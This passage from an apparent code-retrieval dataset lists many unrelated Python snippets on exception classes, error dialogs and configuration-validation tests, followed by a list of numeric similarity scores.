Frame(self.buttonFrame, borderwidth = 1)\n\t\tmessageFrame.pack(fill = BOTH, expand = True)\n\t\t# Creat buttons\n\t\tself.makeButtons()\n\t\t# Create and show an error message as an label\n\t\tvar = StringVar()\n\t\tlabel = Message(messageFrame, textvariable=var, relief=RAISED, width = 1000)\n\t\tvar.set(self.message)\n\t\tlabel.pack(fill = BOTH, expand = True)", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def test_parameter_group_invalid(self, mock_ghn, mock_grnam, mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n mock_grnam.side_effect = KeyError()\n self.configuration.hgst_space_group = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_space_group = 'Fred!`'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def initDefaults(self):\n return _libsbml.GeneralGlyph_initDefaults(self)", "def has_error(self, has_error):\n\n self._has_error = has_error", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def test_init__invalid_notification_center_fails(self):\n\n class InvalidNotificationCenter:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"notification_center\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(notification_center=InvalidNotificationCenter())", "def __init__(self, message=\"\"):\n super(ElementNotFoundError, self).__init__(message)", "def after_init(self):\n if self.options.format.appended:\n self.error_format = self.options.format.appended[0]", "def test_incorrect_init(self):\n with self.assertRaises(MissingMarkersException) as context:\n self.subject()", "def test_wrong_init(self):\n xknx = XKNX()\n knxipframe = KNXIPFrame(xknx)\n with pytest.raises(AttributeError):\n knxipframe.init(23)\n\n with pytest.raises(CouldNotParseKNXIP):\n # this is not yet implemented in xknx\n knxipframe.init(KNXIPServiceType.SEARCH_REQUEST_EXTENDED)", "def error_message(self, error_message):\n\n self._error_message = error_message", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def _plot_init(self):\n pass", "def _plot_init(self):\n pass", "def test_parameter_redundancy_invalid(self, mock_ghn, mock_grnam,\n mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n self.configuration.hgst_redundancy = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_redundancy = 'Fred'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def check_for_setup_error(self):\n super(RBDISCSIDriver, self).check_for_setup_error()\n\n required_options = ['rbd_iscsi_api_user',\n 'rbd_iscsi_api_password',\n 'rbd_iscsi_api_url',\n 'rbd_iscsi_target_iqn']\n\n for attr in required_options:\n val = getattr(self.configuration, attr)\n if not val:\n raise exception.InvalidConfigurationValue(option=attr,\n value=val)", "def __init__(self, raise_error: Optional[bool] = False):\n self.raise_error = raise_error", "def test_parameter_mode_invalid(self, mock_ghn, mock_grnam, mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n self.configuration.hgst_space_mode = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_space_mode = 'Fred'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def error_recovery_settings(self, error_recovery_settings):\n\n self._error_recovery_settings = error_recovery_settings", "def initialize(pelicanobj):\n pelicanobj.settings.setdefault(\"LIBRAVATAR_MISSING\", None)\n pelicanobj.settings.setdefault(\"LIBRAVATAR_SIZE\", None)", "def reset_error_state(self):\n self.error_state = Error.none\n self.error_info = ''", "def test_settings_error():\n cb = MagicMock()\n\n with pytest.raises(ValueError):\n kuber.cli(cb, arguments=[\"render\", \"--settings=foo\"])\n\n cb.assert_not_called()", "def display_error(self, message):\n self.ui_widget.display_error(message=message)", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def test_error_initialisation_from_xdmf_missing_label():\n with pytest.raises(ValueError, match=r\"label\"):\n festim.InitialCondition(value=\"my_file.xdmf\", label=None, time_step=1)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def test_setup_with_invalid_config(self):\n setup_component(self.hass, \"sensor\", INVALID_CONFIG_MINIMAL)\n self.hass.block_till_done()\n\n state = self.hass.states.get(\"sensor.dark_sky_summary\")\n assert state is None", "def place_error_message(self, message):\n msg = tk.Message(self.parent, text='Error: ' + message)\n msg.config(bg='white', font=('times', 18, 'bold'))\n msg.pack()", "def record_global_error(self, error_message):\n self.global_error = error_message", "def _logging_error(self, log_conf, msg):\n QMessageBox.about(\n self, \"Plot error\", \"Error when starting log config [%s]: %s\" % (\n log_conf.name, msg))", "def _check_errors(self, json_loaded):\n\n content = json_loaded\n try:\n m = content[u'error'][u'message']\n c = content[u'error'][u'code']\n out= \"API Error code: {}\\nError message: {}\".format(c, m)\n raise InvalidQueryException(self.name, out)\n except KeyError:\n pass", "def initialize_visualization(self) -> None:\n pass", "def updateMessages(self):\n\n if self.params[1].value:\n if arcpy.Exists(self.params[1].value):\n try:\n arcpy.GetRasterProperties_management(self.params[1].value, \"MINIMUM\")[0]\n except arcpy.ExecuteError:\n self.params[1].setErrorMessage(\n 'No statistics exists for input surface. Please use the Calculate Statistics tool first to calculate statistics.')\n\n if self.params[3].enabled == True:\n if not self.params[3].value:\n self.params[3].setErrorMessage(\n 'DEM must be set in case of HAND raster.')", "def test_colors_fail_uncalibrated(self):\n command = ('{0} -b 100 -e {1} {2} {2} {3}').format(\n os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_ev' + HEN_FILE_EXTENSION),\n 3, 5, 10)\n with pytest.raises(ValueError) as excinfo:\n hen.colors.main(command.split())\n\n assert \"No energy information is present \" in str(excinfo.value)", "def __init__(self, message=None, title=\"COMET encountered an Error\", QiD=None):\n from PyQt5 import QtCore, QtWidgets\n\n self.QiD = QiD\n self.message_buffer = []\n self.title = title\n self.message_counter = 0\n self.msg = None\n\n if message: # Only if called directly\n self.message_buffer = message\n self.showdialog()", "def __init__(self, parent, message, image_to_displayed=None):\r\n\r\n self.text_ = message\r\n path_dir = os.path.dirname(os.path.realpath(__file__))\r\n if image_to_displayed == \"warning\":\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/warning.png\")\r\n elif image_to_displayed == 'check':\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/check.png\")\r\n else:\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/error.png\")\r\n\r\n self.image_ = image_\r\n BasicDialog.__init__(self, parent, title=None)", "def test_wrong_init(self):\n xknx = XKNX()\n knxipframe = KNXIPFrame(xknx)\n with self.assertRaises(TypeError):\n knxipframe.init(23)", "def test_openWindowWithWrongSettingsFile(self):\n self.createWrongSettingsFile()\n return self.assertRaises(SettingsCorrupted, ConfigurationWindow)", "def check_for_setup_error(self):\n\n # If configuration is incorrect we will get exception here\n self._rpc_call('bdev_get_bdevs')", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def set_error(self, code: Optional[int] = None, text: Optional[str] = None) -> None:\n if code is not None:\n self.error_code = code\n if text is not None:\n self.error_text = text", "def initDefaults(self):\n return _libsbml.GraphicalObject_initDefaults(self)", "def errorDialog(self, errormessage):\r\n Tk.tkMessageBox.showerror(self, 'Error', errormessage)", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def test_required(self, missing_param):\n with mock.patch.dict('os.environ', {\n **REQUIRED_SETTINGS,\n missing_param: '',\n }, clear=True), self.assertRaises(ImproperlyConfigured):\n self.reload_settings()", "def __init__(self, *args):\n this = _libsbml.new_SBMLError(*args)\n try: self.this.append(this)\n except: self.this = this", "def test_init__invalid_error_handler_fails(self):\n\n class InvalidErrorHandler:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"error_handler\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(error_handler=InvalidErrorHandler())", "def test_setup_with_invalid_language_config(self):\n setup_component(self.hass, \"sensor\", INVALID_CONFIG_LANG)\n self.hass.block_till_done()\n\n state = self.hass.states.get(\"sensor.dark_sky_summary\")\n assert state is None", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def error(self, message=None, show_help=True):", "def init(self, *args, **kwargs):\n try:\n self._init(*args, **kwargs)\n except (ValueError, TypeError, UnicodeError, ConfigParser.Error), exc:\n raise ConfigInvalidError, str(exc), sys.exc_info()[2]", "def testDefaultErrorMessage(self):\n\n json_message = current.xml.json_message\n\n msg = json_message(False)\n msg = json.loads(msg)\n self.assertEqual(len(msg), 2)\n self.assertEqual(msg[\"status\"], \"failed\")\n self.assertEqual(msg[\"statuscode\"], \"404\")", "def _check_initialized(self):\n self.assertEquals(0, self._error_count)\n self.assertEquals(0, len(self._error_messages))", "def test_node_no_config() -> None:\n node = MyNode()\n\n with pytest.raises(LabGraphError) as err:\n node.setup()\n\n assert (\n \"Configuration not set. Call MyNode.configure() to set the configuration.\"\n in str(err.value)\n )", "def test_raises_if_initial_fieldsets_error(self):\n original_fieldsets = self.form.fieldsets\n test_fieldsets = (\n ('Your Name', {\n 'position': 1,\n 'fields': [('first_name', 'last_name', )],\n }),\n (None, {\n 'classes': ('counting', ),\n 'position': 2,\n 'fields': [\n ('first', 'second', ),\n 'last',\n ],\n }), )\n position_missing_fieldsets = deepcopy(test_fieldsets)\n del position_missing_fieldsets[1][1]['position']\n fields_missing_fieldsets = deepcopy(test_fieldsets)\n del fields_missing_fieldsets[0][1]['fields']\n message = \"There must be 'fields' and 'position' in each fieldset. \"\n self.form.fieldsets = position_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n self.form.fieldsets = fields_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n\n self.form.fieldsets = original_fieldsets", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def test_parameter_user_invalid(self, mock_ghn, mock_grnam, mock_pwnam):\n # Should pass\n self.driver.check_for_setup_error()\n # Should throw exceptions\n mock_pwnam.side_effect = KeyError()\n self.configuration.hgst_space_user = ''\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)\n self.configuration.hgst_space_user = 'Fred!`'\n self.assertRaises(exception.VolumeDriverException,\n self.driver.check_for_setup_error)", "def set_error(self, error):\n self._set_sub_text('error', text=str(error))\n return self", "def initDefaults(self):\n return _libsbml.TextGlyph_initDefaults(self)", "def test_no_setting(self):\n with self.assertRaises(ImproperlyConfigured):\n import_from_setting('DOES_NOT_EXIST')", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n PrepSample('Not_a_Sample', self.prep_template)", "def _checkfigure(self):\n if ((type(self.figure) is Figure) and\n (type(self.axes) in (Subplot, Axes))):\n return\n else:\n raise HKEPlotterNotInitializedError(self.figure,\n self.axes)", "def error_dialog(self, title, message):\n return self._impl.error_dialog(title, message)", "def test_errorfornoarguments(self):\n Square.reset_objects()\n with self.assertRaises(TypeError) as e:\n s1 = Square()\n self.assertEqual(\n str(e.exception),\n \"__init__() missing 1 required positional argument: 'size'\")" ]
[ "0.5554523", "0.52968895", "0.527939", "0.521656", "0.521091", "0.51314735", "0.50853", "0.5000523", "0.4994115", "0.49844408", "0.49832064", "0.49832064", "0.49832064", "0.49656707", "0.49567476", "0.4927834", "0.49192548", "0.49177274", "0.4886028", "0.48816097", "0.48751745", "0.48666832", "0.4864279", "0.48634765", "0.48530832", "0.48484787", "0.48423904", "0.48396248", "0.48167613", "0.48080808", "0.48043492", "0.47968495", "0.47955602", "0.47850254", "0.47689024", "0.47492442", "0.47481132", "0.47263157", "0.4713673", "0.4712421", "0.4700864", "0.46922937", "0.46908474", "0.46837074", "0.46745348", "0.46745348", "0.46620497", "0.4659958", "0.46594888", "0.46434814", "0.46389335", "0.4637929", "0.4617415", "0.46109605", "0.45993844", "0.4596306", "0.45920077", "0.4591397", "0.45895118", "0.45861307", "0.45805475", "0.45685044", "0.4563012", "0.45599443", "0.4559243", "0.45565322", "0.45513046", "0.45512944", "0.45441264", "0.4543126", "0.45408478", "0.4540518", "0.45358482", "0.45350352", "0.45340306", "0.4533074", "0.4521998", "0.45200777", "0.4518669", "0.45176622", "0.45166972", "0.45160687", "0.45149252", "0.45123214", "0.45077962", "0.45046034", "0.45045924", "0.4501639", "0.45006338", "0.44982412", "0.44938934", "0.4488689", "0.44830662", "0.44813448", "0.44799352", "0.44724447", "0.44692594", "0.44625667", "0.44613254", "0.44603965", "0.44538814" ]
0.0
-1
Initializes MissingGraphicField with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def test_model_custom_field_editing_attribute_missing(self):\n\n try:\n error = False\n\n # GIVEN invalid model field definition\n # WHEN model gets executed in the system\n class TestTestModel(models.Model):\n name = AppModelCharField(max_length=256, blank=True, null=True)\n\n except Exception as e:\n msg = e.args[0]\n error = True\n\n # THEN error should be raised\n self.assertTrue(error)\n\n # AND clear error description is present\n ref_msg = 'Field editing statuses are missing for AppModelCharField; called from TestTestModel'\n self.assertEqual(ref_msg, msg)", "def get_empty_mandatory_value_error(field_name):\n\n\tmessage = (\"No value was given for mandatory field '{0}'\".format(field_name))\n\n\treturn message", "def __init__(self, g, msg):\n self.graph = g\n self.message = 'Graph ' + repr(self.graph) + ' error: ' + msg", "def missing_information(self, info, field):\n raise NoData", "def __init__(self, message='', path=(), notes=()):\n self.message = message\n self.plain_message = message # for backwards compat\n self.path = list(path)\n self.notes = notes\n super(PlotlyGraphObjectError, self).__init__(message)", "def test_raises_on_missing_needed_fields(self):\n test_name = \"impossible_creature_not_present\"\n self.form.constructor_fields = [*self.form.constructor_fields, test_name]\n message = \"The fields for email, username, and constructor must be set in fields. \"\n self.assertNotIn(test_name, self.form.base_fields)\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def add_required_field_fail(self, field, data):\n message = '{} is required'.format(self.fields[field])\n data = data.copy()\n\n data[field] = ''\n self.add_fail(data, message)\n assert not self.verify_object(data)\n\n del data[field]\n self.add_fail(data, message)\n assert not self.verify_object(data)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def testValidate_Required(self):\n class SimpleMessage(messages.Message):\n required = messages.IntegerField(1, required=True)\n\n simple_message = SimpleMessage()\n self.assertRaises(messages.ValidationError,\n simple_message.check_initialized)\n simple_message.required = 10\n simple_message.check_initialized()", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def test_raise_on_missing_critical(self):\n name_for_field = 'absent_field'\n field_opts = {'names': (name_for_field, 'absent'), 'alt_field': '', 'computed': False}\n critical_fields = {'absent_field': field_opts}\n with self.assertRaises(ImproperlyConfigured):\n self.form.fields_for_critical(critical_fields)", "def testMessageFieldValidate_Initialized(self):\n class MyMessage(messages.Message):\n field1 = messages.IntegerField(1, required=True)\n\n field = messages.MessageField(MyMessage, 10)\n\n # Will validate messages where is_initialized() is False.\n message = MyMessage()\n field.validate(message)\n message.field1 = 20\n field.validate(message)", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def __init__(self, message=\"\"):\n super(ElementNotFoundError, self).__init__(message)", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def __init__(self, msg, path_to_item=None):\n self.path_to_item = path_to_item\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiAttributeError, self).__init__(full_msg)", "def initErrMsgImage(self):\n draw = ImageDraw.Draw(self.errMsgImage)\n # Outline\n draw.rectangle((0,0,self.width-1,self.height-1),outline=255,fill=0)\n # Stripes\n nLines = 8\n lineSlope = self.height/2\n for i in range(0,nLines):\n x0 = i*self.width/(2*nLines)\n y0 = 0\n x1 = x0 - lineSlope\n y1 = self.height\n draw.line((x0,y0,x1,y1),fill=255)\n # Text box\n x0 = self.width/4\n y0 = 0\n x1 = self.width-1\n y1 = self.height-1\n draw.rectangle((x0,y0,x1,y1),outline=255,fill=0)\n # Error symbols\n x0 = self.width/16\n y0 = 3*self.height/4\n x1 = 3*self.width/16\n y1 = y0\n x2 = (x0 + x1)/2\n y2 = self.height/4\n draw.polygon((x0,y0,x1,y1,x2,y2),outline=255,fill=255)\n draw.text((x0+6,y2+5),'!',font=self.font,fill=0)\n return", "def _initialize_fill_color_if_not_initialized(self) -> None:\r\n if hasattr(self, '_fill_color'):\r\n return\r\n self._fill_color = String('')", "def testConstructorNotAField(self):\n class SomeMessage(messages.Message):\n pass\n\n self.assertRaisesWithRegexpMatch(\n AttributeError,\n ('May not assign arbitrary value does_not_exist to message '\n 'SomeMessage'),\n SomeMessage,\n does_not_exist=10)", "def test_raises_on_constructor_fields_error(self):\n self.form.constructor_fields = None\n message = \"Expected a list of field name strings for constructor_fields. \"\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_missing_required_field_raises_error():\n with pytest.raises(ValidationError):\n Entity()", "def test_model_formfield_doesnt_raise(self):\n try:\n fields_for_model(Color())\n except AttributeError:\n self.fail(\"Raised Attribute Error\")", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "async def test_create_missing_field(self):\n # the \"value\" field is missing\n data = {'id': 'foo'}\n with self.assertRaises(InvalidResourceDetails) as cm:\n await self.resource.create(data)\n self.assertEqual(\n 'Error: \"value\": Required', str(cm.exception))", "def missing(self, value):\n self.MISSING = value", "def test_creation_throws_error_on_missing_fields(self, test_domain):\n with pytest.raises(ValidationError) as err:\n test_domain.repository_for(Person)._dao.create(last_name=\"Doe\")\n\n assert err.value.messages == {\"first_name\": [\"is required\"]}", "def set_invalidated(self):\n # GTK Settings for evogtk\n self.set_property('image',self.__errorimg)", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def check_initialized(self):\n for name, field in self.__by_name.items():\n value = getattr(self, name)\n if value is None:\n if field.required:\n raise ValidationError(\n \"Message %s is missing required field %s\" %\n (type(self).__name__, name))\n else:\n try:\n if (isinstance(field, MessageField) and\n issubclass(field.message_type, Message)):\n if field.repeated:\n for item in value:\n item_message_value = field.value_to_message(\n item)\n item_message_value.check_initialized()\n else:\n message_value = field.value_to_message(value)\n message_value.check_initialized()\n except ValidationError as err:\n if not hasattr(err, 'message_name'):\n err.message_name = type(self).__name__\n raise", "def on_init_fail(self, event_time, message):\n pass", "def testValidate_Optional(self):\n class SimpleMessage(messages.Message):\n non_required = messages.IntegerField(1)\n\n simple_message = SimpleMessage()\n simple_message.check_initialized()\n simple_message.non_required = 10\n simple_message.check_initialized()", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def test_error_initialisation_from_xdmf_missing_label():\n with pytest.raises(ValueError, match=r\"label\"):\n festim.InitialCondition(value=\"my_file.xdmf\", label=None, time_step=1)", "def add_error(self, field, message):\n add_list_value(self.errors, field, message)", "def test_raises_if_initial_fieldsets_error(self):\n original_fieldsets = self.form.fieldsets\n test_fieldsets = (\n ('Your Name', {\n 'position': 1,\n 'fields': [('first_name', 'last_name', )],\n }),\n (None, {\n 'classes': ('counting', ),\n 'position': 2,\n 'fields': [\n ('first', 'second', ),\n 'last',\n ],\n }), )\n position_missing_fieldsets = deepcopy(test_fieldsets)\n del position_missing_fieldsets[1][1]['position']\n fields_missing_fieldsets = deepcopy(test_fieldsets)\n del fields_missing_fieldsets[0][1]['fields']\n message = \"There must be 'fields' and 'position' in each fieldset. \"\n self.form.fieldsets = position_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n self.form.fieldsets = fields_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n\n self.form.fieldsets = original_fieldsets", "def test_that_field_required_validations_are_triggered_on_incorrect_attribute_setting(\n self,\n ):\n person = Person(first_name=\"Johnny\", last_name=\"John\")\n\n with pytest.raises(ValidationError) as error:\n person.first_name = \"\" # Simulate an error by force-resetting an attribute\n\n assert error.value.messages == {\"first_name\": [\"is required\"]}", "def __init__(self):\n self.message = \"Boundary too large, must be less than one degree of latitude and longitude.\"", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(pixel_point0, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.name is None:\n self.name = ''\n if self.red_u is None:\n self.red_u = []\n if self.red_v is None:\n self.red_v = []\n if self.yellow_u is None:\n self.yellow_u = []\n if self.yellow_v is None:\n self.yellow_v = []\n if self.green_u is None:\n self.green_u = []\n if self.green_v is None:\n self.green_v = []\n if self.purple_u is None:\n self.purple_u = []\n if self.purple_v is None:\n self.purple_v = []\n if self.orange_u is None:\n self.orange_u = []\n if self.orange_v is None:\n self.orange_v = []\n else:\n self.name = ''\n self.red_u = []\n self.red_v = []\n self.yellow_u = []\n self.yellow_v = []\n self.green_u = []\n self.green_v = []\n self.purple_u = []\n self.purple_v = []\n self.orange_u = []\n self.orange_v = []", "def required_field_fail(self, field, data):\n self.add_required_field_fail(field, data)\n self.update_required_field_fail(field, data)", "def test_raise_missing_flag_field(self):\n original_data = self.form.data\n original_fields = self.form.fields\n original_flag = self.form.USERNAME_FLAG_FIELD\n original_cleaned_data = getattr(self.form, 'cleaned_data', None)\n original_errors = getattr(self.form, '_errors', None)\n self.form.data = original_data.copy()\n self.form.fields = original_fields.copy()\n self.form.USERNAME_FLAG_FIELD = 'Not a valid field name'\n self.form.cleaned_data = {self.form.name_for_user: 'test_username', self.form.name_for_email: 'test_email'}\n # self.form._errors = ErrorDict() if original_errors is None else original_errors.copy()\n self.form._errors = None if original_errors is None else original_errors.copy()\n\n with self.assertRaises(ImproperlyConfigured):\n self.form.configure_username_confirmation()\n\n self.form.data = original_data\n self.form.fields = original_fields\n self.form.USERNAME_FLAG_FIELD = original_flag\n self.form.cleaned_data = original_cleaned_data\n self.form._errors = original_errors\n if original_cleaned_data is None:\n del self.form.cleaned_data\n if original_errors is None:\n del self.form._errors", "def get_missing_image(self):\n # This class should have a 'name' property so it mimics the Django file\n # field.\n return MissingProductImage()", "def __mandatory_is_not_given(self):\n\n strTestName = 'Mandatory parameter must be given (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('mandatory_parameter', 'Mandatory parameter')\n\n self.__parametersCheck_error(RxCSObject, ParameterMissingError, strTestName)", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in LogicalConnector \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in LogicalConnector \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def test_construct_values_raises_for_missing_fields(self):\n message = \"There must me one or more field names to compute a value. \"\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.construct_value_from_values()\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.construct_value_from_values('')\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.construct_value_from_values([])", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def __init__(self, msg='hello'):\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in Validator \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in Validator \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n 